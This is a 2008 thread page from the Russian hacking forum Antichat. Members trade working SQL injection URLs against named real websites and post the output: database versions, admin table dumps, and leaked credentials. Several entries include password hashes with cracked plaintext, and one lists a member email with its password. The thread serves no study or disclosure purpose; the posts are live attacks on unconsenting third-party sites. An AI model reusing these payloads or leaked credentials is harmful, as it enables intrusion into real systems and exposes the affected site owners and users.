HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4311  
Старый 04.01.2008, 03:18
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от b3  
search.icq.com

Сама уязвимость :

Результат за 5 минут:

www.mosapteki.ru
Alesta:5cda66bc6dcaa02a447c95c8fa4a1ec9
===
www.vet.ru
spacedefender:ab334feeb31c05124cb73fa12571c2f6:cap tain
===
skazki-o-sile.ru
admin:0a8a413d9bc599c8e1de5fda8aa6eb02
===
www.npnh.ru
npnh:a942f5f0961d0154b26e41db069cde6b
===
www.usinsknet.ru
admin:fe01d67a002dfa0f3ac084298142eccdrange
===
www.liveinstyle.ru
admin:ae2b1fca515949e5d54fb22b8ed95575:testing
===
www.7435588.ru
Admin:246edc51f5bbea6acb7b456d4b4a6a7a:yupopa
===
www.fut-bol.ru
9389ff7e426048ed1ca3aa6b9b341a1d
===
http://www.manhattan-receivers.com
Administrator:8b1910f8606a57e795e0f39f8bcd0d24:cka ljotia
===
http://www.ua-china.com
admin:42bb650a9dfb3927c79ffaaae1e1abce:simfo
===
http://www.nauticapress.com
admin:9ae5bdc58f37d3b242a8c077a5d500f5rvalho
===
Это боян. Под xoops уже кто то сплойт писал, под именно такую багу:\
__________________
..
 
Ответить с цитированием

  #4312  
Старый 04.01.2008, 03:23
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

вы что реально думаете что icq.com на мускуле работает? там сибэйз асе последней ветки
и вобще там права mbread вобщем бесполезно, и нечего мучаться
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 04.01.2008 в 04:09..
 
Ответить с цитированием

  #4313  
Старый 04.01.2008, 04:24
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

www.awdf.org

Код HTML:
http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
5.0.22:robin@localhost:dbawdf3

Код HTML:
  http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+count(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+information_schema.tables/*
В ответ я получил 1906, но проверив, таблиц оказалось меньше 100 =)

Код HTML:
http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+adminusers+LIMIT+0,1/*
1:test:test:robin@test.com
2:vera:test:vear@awdf.org

(http://www.awdf.org/admin/index.php)

Код HTML:
http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(userid,0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+dbacademicafrica.aa_user+LIMIT+5,1/*
11:admin:AA6tQYSfGxd/A

Код HTML:
http://www.awdf.org/pages/?pid=2&sid=-24+UNION+SELECT+concat(memberid,0x3a,email,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+dbacademicafrica.aa_member+LIMIT+650,1/*
655:gyenfi@yahoo.com:johnog
 
Ответить с цитированием

  #4314  
Старый 04.01.2008, 04:25
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.72dpi.co.nz/

Код:
http://www.72dpi.co.nz/packages/index.php?pid=-1+union+select+1,convert(concat_ws(0x3a,us   er(),database(),version())+using+latin1),3,4/*
 
Ответить с цитированием

  #4315  
Старый 04.01.2008, 14:10
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

http://policies.lakeheadu.ca

Код HTML:
http://policies.lakeheadu.ca/policy.php?pid=-178+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),user(),database()),19/*
4.1.21-standard-log:admini@localhost:administration
 
Ответить с цитированием

  #4316  
Старый 04.01.2008, 16:27
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

MsSQL injection:
Цитата:
http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+db_name())--
www.aiim.org - Google PR 7 .
 
Ответить с цитированием

  #4317  
Старый 04.01.2008, 23:44
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

http://webcast.streamx.com.au/?id=1'+or+1=(SELECT+db_name())--

Последний раз редактировалось А®ТеS; 04.01.2008 в 23:47..
 
Ответить с цитированием

  #4318  
Старый 05.01.2008, 01:05
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.botellaalmar.com.ar/

Код:
http://www.botellaalmar.com.ar/detalle_nota.php?Id=10002&tipo=-1+union+select+concat_ws(0x3a,user(),version(),database())/*
 
Ответить с цитированием

  #4319  
Старый 05.01.2008, 01:59
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

www.7courier.com

Цитата:
http://www.7courier.com/shopping.php?id=-37+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7/*
4.1.22-standard:thetphyo_7courier:thetphyo_7c@localhost

www.belledune.com

Цитата:
http://www.belledune.com/shopping.php?id=-11+union+select+1,2,convert(concat(version(),0x3a, database(),0x3a,user())+using+latin1),4,5,6,7,8,9, 10,11,12,13/*
5.0.18-nt :belledunedb: belleduneUSER@localhost

www.visitrandolphcounty.com

Цитата:
http://www.visitrandolphcounty.com/shopping.php?id=-11+union+select+1,2,concat(version(),0x3a,database (),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.20: visitrandolph: visitran@localhost

Последний раз редактировалось ThreeD; 05.01.2008 в 02:20..
 
Ответить с цитированием

  #4320  
Старый 05.01.2008, 03:09
scrat
Постоянный
Регистрация: 08.04.2007
Сообщений: 853
Провел на форуме:
5812656

Репутация: 1540


Отправить сообщение для scrat с помощью ICQ
По умолчанию

http://new.prikolnoe.tv
Цитата:
http://new.prikolnoe.tv/?show=1&c_id=12&id_movie=275%60
http://new.prikolnoe.tv/?show=1&c_id=12%60&id_movie=275
чёто не оч. получается она у меня

Последний раз редактировалось scrat; 05.01.2008 в 03:13..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ